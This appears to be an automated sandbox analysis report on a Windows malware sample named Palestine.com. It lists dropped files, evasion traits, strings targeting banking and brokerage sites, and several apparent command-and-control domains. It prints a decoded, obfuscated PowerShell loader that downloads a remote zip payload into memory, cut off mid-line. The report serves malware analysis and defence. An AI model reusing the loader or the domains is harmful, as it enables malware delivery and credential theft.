                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\aaHMLib_x64.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5ScriptTools.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\HalUninstall.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-8FE4M.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-BUBHC.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DiskMediaTypeLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-HNNQ8.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-BAEH3.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-I791C.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-IECK1.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-DF4GF.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\System.Net.Http.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-MJJQ3.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-7QIOU.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\FSharp.Core.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\CPUManufacturerCmdLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\msvcp140d.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-1MK9F.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-PSF4N.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-MOT2M.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\VideoMemoryLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-Q1AT3.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\qtgraphicaleffectsprivate.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-RLSFG.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-QCTRS.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\clrjit.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Script.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-G5QCH.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-DK0J4.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-MQD1U.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-E63PO.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\cpuidsdk64.dll (copy)Jump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\CN.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\tipskins.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Gui.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-KG79P.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\FanProfile.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-ECL6Q.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-URGPI.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\7za.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\vcruntime140_1.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-PDJ8O.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Widgets.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-DDTGT.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-45OJH.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-UDQ9J.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\qsqlite.dll (copy)Jump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.Build.Tasks.CodeAnalysis.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com TID: 5508 | Thread sleep time: -240000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com TID: 548 | Thread sleep time: -210000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3660 | Thread sleep count: 3463 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3660 | Thread sleep count: 6354 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6192 | Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\650429\
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\650429
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696584680t
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696584680
                Source: powershell.exe, 00000021.00000002.2244510007.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696584680p
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696584680^
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696584680n
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696584680]
                Source: powershell.exe, 00000021.00000002.2244510007.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:T
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000045.00000002.2428703154.0000000001059000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+=
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696584680x
                Source: powershell.exe, 00000021.00000002.2377774305.0000000008724000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA(
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696584680
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696584680s
                Source: Palestine.com, 00000011.00000002.2036575036.0000000004760000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001CD3000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2389704146.0000000001610000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042AE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696584680|UE
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696584680x
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696584680u
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696584680
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696584680
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696584680}
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 00000028.00000002.2077631892.000000000123E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y+
                Source: powershell.exe, 00000021.00000002.2368278483.0000000008603000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: powershell.exe, 00000021.00000002.2377256586.0000000008719000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _VMware_SATA_CD0
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696584680x
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696584680t
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696584680
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000045.00000002.2428703154.0000000001059000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
                Source: powershell.exe, 00000021.00000002.2244510007.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696584680
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696584680~
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696584680}
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696584680
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696584680h
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004456000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696584680p
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696584680
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696584680z
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696584680o
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696584680f
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696584680
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696584680
                Source: powershell.exe, 00000021.00000002.2377256586.0000000008719000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: om&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&0m
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696584680j
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696584680d
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
                Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
                Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
                Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
                Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
                Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | Process created: Base64 decoded .((GET-vaRIABLe '*Mdr*').naMe[3,11,2]-joIn'') ((('SEt-vaRIaBle (6Sv8ma6Sv+6SvFZ6Sv) ( [TYp'+'E](6Sv{2}{0}{3}{4}{1}6Sv-FlTVelTV,lT'+'VINlTV,lTVSy'+'STlTV,lTVm.iolTV,lTV.SeEKoRIGlTV)); sEt-ITeM Variable:8APc ( [Type](6Sv{1}{2}{0}'+'6Sv -F lTVDlTV,lTVSYslTV,lTVtEM.gU'+'IlT'+'V) ) ; sV cg0'+'q ( [tYPe](6Sv{3}{0}{1}{4}{2}6Sv -FlTVteM.iO'+'lTV,lTV.PlTV,lTVhlTV,lTVSYSlTV,lTVAT'+'lTV))'+' ; Set-Vari'+'able -Name uB2gt -Value ([TYPe](6Sv{1}{2}{0}{3}6Sv -f lTVEm.I'+'O.FlTV,lTVSylTV,lTVSTlTV,lTVILElTV)) ; Set-Variable -Name scRIPTBLOCk -Value ({ '+' Set-Variable -Name ZIPURl -Value (6Sv{3}{7}{6}{4}{9}{1}{10}{8}{0}{5}{2}6Sv -flTVtl'+'TV,lTVp/l'+'TV,lTVtxtlTV,lTVhtlTV,lTViptedelTV,lTV_clp_pan.lTV,lTVs://kllTV,lTVtplTV,lTVnlTV,lTVhoa.sh'+'olTV,lTVilTV) Set-Variable -Name wEBclIENt -Value (.(6Sv{1}{2}{0}6Sv -flTVjectlTV,lTVNewlTV,lTV-OblTV) (6Sv{1}{0}{2}{3}6Sv-f lTVet.WlTV,lTVSys'+'tem.NlTV,lTVelTV,lTV'+'bClientlTV))'+' Set-Variab'+'le -Name ZiPdatA -Value'+' (DyE{weBUmBCLBUmIEnT}.(6Sv{3}{1}{0}{2}6Sv -flTVatlTV,lTVadDlTV,lTValTV,lTVDownlolTV).Invoke('+'DyE{zBUmIPBUmUrl})'+') '+' Set-Variable -Name MEMoRy'+'STrEAm -Value (&(6Sv{2}{1}{0}6Sv-f lTVec'+'tlTV,lTVObjlTV,lTVNew-lTV) (6Sv{2}{3}{1}'+'{0}6Sv-f lTV'+'amlTV,lTVStrelTV,lTVSyslTV,lTVtem.IO.MemorylTV)) DyE{MemBUmorySTrBUmeam}.(6Sv{0}{1}6Sv -flTVWlTV,l'+'TVritelTV).Invo'+'ke(DyE{ZIBUmpDaTA}, 0, DyE{ZiPBUmDBUmAta}.6SvlenGBUmTH6Sv) DyE{mEmORBUmYBUmStBUmREBUmAM}.6SvsB'+'UmEe'+'k6Sv(0, (VARIABLE (6Sv8mA6Sv+6S
                Source: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe | NtQuerySystemInformation: Direct from: 0x59102166
                Source: Palestine.com, 00000011.00000003.1459687507.000000000493E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: rapeflowwj.lat
                Source: Palestine.com, 00000011.00000003.1461984326.0000000004861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: crosshuaht.lat
                Source: Palestine.com, 00000011.00000003.1461984326.0000000004861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: sustainskelet.lat
                Source: Palestine.com, 00000011.00000003.1461984326.0000000004861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: aspecteirs.lat
                Source: Palestine.com, 00000011.00000003.1461984326.0000000004861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: energyaffai.lat
                Source: Palestine.com, 00000011.00000003.1461984326.0000000004861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: necklacebudi.lat
